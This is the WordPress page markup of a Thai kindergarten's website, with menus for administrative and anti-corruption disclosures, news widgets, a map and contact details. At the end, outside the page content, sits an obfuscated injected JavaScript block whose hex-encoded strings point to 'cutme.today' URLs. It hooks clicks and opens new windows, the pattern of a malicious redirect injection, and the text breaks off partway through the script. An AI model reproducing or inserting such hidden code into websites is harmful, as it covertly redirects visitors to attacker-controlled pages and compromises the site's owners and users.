{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-40\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\